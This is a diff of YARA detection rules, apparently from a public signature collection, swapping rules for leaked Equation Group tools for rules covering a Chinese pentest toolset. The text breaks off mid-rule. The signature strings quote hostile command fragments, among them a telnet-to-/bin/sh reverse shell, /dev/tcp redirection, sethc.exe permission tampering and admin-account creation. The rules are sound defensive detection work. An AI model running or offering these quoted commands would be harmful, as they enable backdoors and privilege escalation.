-		logic_hash = "f15b3b4281ec45a7a71c9bf8b88c60befec665f78b76a615c5912a6b7f94235b"
-		score = 75
+		hash = "b24d761c6bbf216792c4833890460e8b37d86b37"
+		logic_hash = "17f1d7f2345ed1bc9b240c4851f41891244ec9d13b296a24ab6b42cca32ddf87"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
 
 	strings:
-		$s1 = "[-] kernel not vulnerable" fullword ascii
-		$s2 = "[-] failed to spawn shell" fullword ascii
+		$s0 = "del /q /f %systemroot%system32sethc.exe" fullword ascii
+		$s1 = "cacls %s /t /c /e /r administrators" fullword ascii
+		$s2 = "\\dllcache\\sethc.exe" ascii
+		$s3 = "\\ntvdm.exe" ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Smash : FILE
+rule SIGNATURE_BASE_CN_Honker_Exp_Win2003 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
+		description = "Sample from CN Honker Pentest Toolset - file win2003.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a8cb090-4f47-5674-accb-f233dbb19b71"
-		date = "2017-04-08"
+		id = "f64e14dd-714c-5a0f-923d-23a584fe605f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L717-L732"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1335-L1351"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "073496e34dded05be40ee851442f9c0ec998f35e02a5d4221677a195b792f786"
-		score = 75
+		hash = "47164c8efe65d7d924753fadf6cdfb897a1c03db"
+		logic_hash = "d1616c53b26eefaa2578efb7defee182e8c88c869cfffb16c8767ddc1869ad46"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
 
 	strings:
-		$x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii
-		$x2 = "no command given!! bailing..." fullword ascii
-		$x3 = "no port. assuming 22..." fullword ascii
+		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
+		$s2 = "The shell \"cmd\" success!" fullword ascii
+		$s4 = "Not Windows NT family OS." fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ratload : FILE
+rule SIGNATURE_BASE_CN_Honker_Interception3389_Setup : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
+		description = "Sample from CN Honker Pentest Toolset - file setup.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81590569-e81b-5d97-8295-cc6f018fab98"
-		date = "2017-04-08"
+		id = "7250ff73-6b08-56a4-b2bc-081060d1fa2d"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L734-L749"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1353-L1371"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "34298175663a01b26e317c31c720f2f4fe93a5c7e375c9642664479d8672e8cd"
-		score = 75
+		hash = "f5b2f86f8e7cdc00aa1cb1b04bc3d278eb17bf5c"
+		logic_hash = "d3f543683810a985a190cc3ea8edb7bfcd316d56a13d45c6532c488a4536ad0a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
 
 	strings:
-		$x1 = "/tmp/ratload.tmp.sh" fullword ascii
-		$x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
-		$s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
+		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\%s" fullword ascii
+		$s1 = "%s\\temp\\temp%d.bat" fullword ascii
+		$s5 = "EventStartShell" fullword ascii
+		$s6 = "del /f /q \"%s\"" fullword ascii
+		$s7 = "\\wminotify.dll" ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ys : FILE
+rule SIGNATURE_BASE_CN_Honker_Cncert_Ccdoor_CMD_2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
+		description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "abd120e7-23f8-530e-b21e-c50a2b571332"
-		date = "2017-04-08"
+		id = "2681a989-6504-5ac7-abc9-e6dad2a052c5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L751-L766"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1373-L1390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4962cc732ce3dea6dc52c7d91ce94089eb4498ba4c442ecc6363ea75de47de31"
-		score = 75
+		hash = "7f3a6fb30845bf366e14fa21f7e05d71baa1215a"
+		logic_hash = "8f33f2999eae3f080e8e5ec51ced3e7d596a07b6e5c9830cc1ca552701ed6502"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
 
 	strings:
-		$x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii
-		$x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii
-		$x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii
+		$s0 = "cmd.dll" fullword wide
+		$s1 = "cmdpath" fullword ascii
+		$s2 = "Get4Bytes" fullword ascii
+		$s3 = "ExcuteCmd" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 22KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ewok : FILE
+rule SIGNATURE_BASE_CN_Honker_Exp_Ms11046 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
+		description = "Sample from CN Honker Pentest Toolset - file ms11046.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "379c233f-86f8-5116-a15c-8a80b27daea6"
-		date = "2017-04-08"
+		id = "aafb45f4-3b42-5c8f-8c25-40fd01217e9d"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L768-L784"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1392-L1409"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d10d75885daa8cd20e5d7d7e142d1e7a2dbc10a50debf7892629f67b948bbdbe"
-		score = 75
+		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
+		logic_hash = "0496e5c062c1a248b118c2f6009c95bfddf753e5491529d4ec43cfaf1ea0c0c5"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
 
 	strings:
-		$x1 = "Example: ewok -t target public" fullword ascii
-		$x2 = "Usage:  cleaner host community fake_prog" fullword ascii
-		$x3 = "-g  - Subset of -m that Green Spirit hits " fullword ascii
-		$x4 = "--- ewok version" fullword ascii
+		$s0 = "[*] Token system command" fullword ascii
+		$s1 = "[*] command add user 90sec 90sec" fullword ascii
+		$s2 = "[*] Add to Administrators success" fullword ascii
+		$s3 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 80KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Xspy : FILE
+rule SIGNATURE_BASE_CN_Honker_Master_Beta_1_7 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
+		description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fcb7246a-d613-51d7-a4f7-f767fa5f79e1"
-		date = "2017-04-08"
+		id = "78f904ec-f7cb-5fd0-a117-925ebedd1d3e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L786-L799"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1411-L1426"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "94ab45d6c94c63c5c9c68ee3d509143af4eb574058c0cd4f26eed8058dbd9213"
-		score = 75
+		hash = "3be7a370791f29be89acccf3f2608fd165e8059e"
+		logic_hash = "13c9cc0bf8aaed2ba86baeee6f0b32bf71108dc1350dcffd03e70393fa975c9f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
 
 	strings:
-		$s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii
+		$s1 = "http://seo.chinaz.com/?host=" fullword ascii
+		$s2 = "Location: getpass.asp?info=" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 60KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 312KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Estesfox
+rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck_2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
+		description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f2e8b8ba-af09-5e7c-a99c-4f620a0917c9"
-		date = "2017-04-08"
+		id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L801-L814"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1428-L1446"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bfbc8ac62dcb61b492b1803de535f51ceb54ac83e45071270a6ef5faeaa521b2"
-		score = 75
+		hash = "0783661077312753802bd64bf5d35c4666ad0a82"
+		logic_hash = "85c73d480019929eef5951b0395f49cea86dc83b334860e940cc6e36c2d96d3a"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
 
 	strings:
-		$x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii
+		$s1 = "F4ck.exe" fullword wide
+		$s2 = "@Netapi32.dll" fullword ascii
+		$s3 = "Team.F4ck.Net" fullword wide
+		$s8 = "Administrators" fullword ascii
+		$s9 = "F4ck Team" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Elatedmonkey_1_0_1_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_80_Antifw : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
+		description = "Sample from CN Honker Pentest Toolset - file AntiFW.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8915305-2ed7-50b7-84d0-b139a6d3481a"
-		date = "2017-04-08"
-		modified = "2022-08-18"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L816-L832"
+		id = "761bed41-e8e6-585b-8fde-a6b6a56445d6"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1448-L1466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "756337ecb951357c5440ea2fe010982089539c35dc556288d61db6de22348c1f"
-		score = 75
+		hash = "5fbc75900e48f83d0e3592ea9fa4b70da72ccaa3"
+		logic_hash = "5e940406b713458ae7168d4e140f15a262b7f0834d29db9c88f1f04bedb41e43"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii
-		$s2 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii
-		$s3 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii
-		$s4 = "cat > /dev/tcp/127.0.0.1/80 <<" ascii
+		$s1 = "Set TS to port:80 Successfully!" fullword ascii
+		$s2 = "Now,set TS to port 80" fullword ascii
+		$s3 = "echo. >>amethyst.reg" fullword ascii
+		$s4 = "del amethyst.reg" fullword ascii
+		$s5 = "AntiFW.cpp" fullword ascii
 
 	condition:
-		filesize < 15KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Scanner : FILE
+rule SIGNATURE_BASE_CN_Honker_Wwwscan_Gui : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
+		description = "Sample from CN Honker Pentest Toolset - file wwwscan_gui.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2f9c534-0ca7-5223-b85e-8e74c3cfa6ff"
-		date = "2017-04-08"
+		id = "fffed806-4394-505a-96bd-50bf6f24aefc"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L834-L849"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1468-L1483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0454fd41d3591fc5811da6407a422b7c28d0b923109cdfa85b337cc7fffb178"
-		score = 75
+		hash = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
+		logic_hash = "9c25cf33fc2f675c8db7b24f2abe03d54c0ae17927e0ca9ccd3e5b97ffc56f73"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
 
 	strings:
-		$x1 = "program version netid     address             service         owner" fullword ascii
-		$x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii
-		$x5 = "-scan winn %s one" fullword ascii
+		$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+		$s2 = "/eye2007Admin_login.aspx" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 280KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup__Ftshell_Ftshell_V3_10_3_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Swordcolledition : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
+		description = "Sample from CN Honker Pentest Toolset - file SwordCollEdition.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
-		date = "2017-04-08"
+		id = "4e8d4d48-c053-5579-be9c-af73ec0fe614"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L853-L871"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1485-L1500"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1eb7915fd057b2cc5f788ca11b3c71210ce5e7ac29c52790c249490435e62926"
-		score = 75
+		hash = "6e14f21cac6e2aa7535e45d81e8d1f6913fd6e8b"
+		logic_hash = "bbc5c9bb91bdd60582e2d7f6fa9b1a1cc3799e0809b670d575d9b2c77bf5e884"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
-		hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
 
 	strings:
-		$s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii
-		$s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
-		$s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii
-		$s4 = "# ftshell -- File Transfer Shell" fullword ascii
+		$s0 = "YuJianScan.exe" fullword wide
+		$s1 = "YuJianScan" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 225KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup__Scanner_Scanner_V2_1_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Hconstfportable : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2"
+		description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf1f2119-f742-5106-96f0-de88755275ef"
-		date = "2017-04-08"
+		id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L873-L892"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1502-L1517"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c42aaacea1347fd64d7f91421f692e77e33e273d4c2e71806ef7f5f086aba11"
-		score = 75
+		hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
+		logic_hash = "d4368994d38b87a4c0a53321a468fa8a72411ccb17befa0bbc62bdd6de9e1a52"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
-		hash2 = "9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff"
 
 	strings:
-		$s1 = "Welcome to the network scanning tool" fullword ascii
-		$s2 = "Scanning port %d" fullword ascii
-		$s3 = "/current/down/cmdout/scans" fullword ascii
-		$s4 = "Scan for SSH version" fullword ascii
-		$s5 = "program vers proto   port  service" fullword ascii
+		$s1 = "HconSTFportable.exe" fullword wide
+		$s2 = "www.Hcon.in" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 100KB and 2 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 354KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup__Ghost_Sparc_Ghost_X86_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V3_LPK : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86"
+		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ccc9c9be-8f78-5071-a11e-47f994cf8f08"
-		date = "2017-04-08"
+		id = "c5b806d9-74dc-5244-b1e0-9837abeaeaac"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L894-L912"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1519-L1536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c4ad8e06934c1ece520863951f14cbf86d1bc4bba97aede1d58def1e5c7df4eb"
-		score = 75
+		hash = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
+		logic_hash = "20e949bef1c1631ef2a48c78c2ccc4dcea2f842275ec5df3e31c5d915e8a2a04"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1"
-		hash2 = "82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33"
 
 	strings:
-		$x1 = "Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target" fullword ascii
-		$x2 = "Sending shellcode as part of an open command..." fullword ascii
-		$x3 = "cmdshellcode" fullword ascii
-		$x4 = "You will not be able to run the shellcode. Exiting..." fullword ascii
+		$s1 = "FreeHostKillexe.exe" fullword ascii
+		$s2 = "\\sethc.exe /G everyone:F" ascii
+		$s3 = "c:\\1.exe" fullword ascii
+		$s4 = "Set user Group Error! Username:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 70KB and 1 of them ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup__Pclean_V2_1_1_Pclean_V2_1_1_4 : FILE
+rule SIGNATURE_BASE_CN_Honker_Without_A_Trace_Wywz : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64"
+		description = "Sample from CN Honker Pentest Toolset - file Wywz.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ed4a3b3a-0935-533b-80dd-ee23b2e8df00"
-		date = "2017-04-08"
+		id = "1093c0c3-499f-5aec-ad4a-878d377296d5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L914-L930"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1538-L1554"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5622d6fff876fa5d07795491d14f0396378c1b07b69cf8bcabb5e0bd3c19e72a"
-		score = 75
+		hash = "f443c43fde643228ee95def5c8ed3171f16daad8"
+		logic_hash = "0f6ca7d44312afef49d3094af7b33af5e41f4531e7e7f9f37cf050700755bb3e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
-		hash2 = "ab7f26faed8bc2341d0517d9cb2bbf41795f753cd21340887fc2803dc1b9a1dd"
 
 	strings:
-		$s1 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
-		$s2 = "e.g.: -n 1-1024,1080,6666,31337 " fullword ascii
+		$s1 = "\\Symantec\\Norton Personal Firewall\\Log\\Content.log" ascii
+		$s2 = "UpdateFile=d:\\tool\\config.ini,Option\\\\proxyIp=127.0.0.1\\r\\nproxyPort=808" ascii
+		$s3 = "%s\\subinacl.exe /subkeyreg \"%s\" /Grant=%s=f /Grant=everyone=f" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1800KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup__Jparsescan_Parsescan_5 : FILE
+rule SIGNATURE_BASE_CN_Honker_LPK2_0_LPK : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan"
+		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "964a4e49-9163-5dd6-bb2c-88fa39d5f356"
-		date = "2017-04-08"
+		id = "4aa40b78-5fe4-5312-881c-e5a292435ff0"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L932-L950"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1556-L1573"
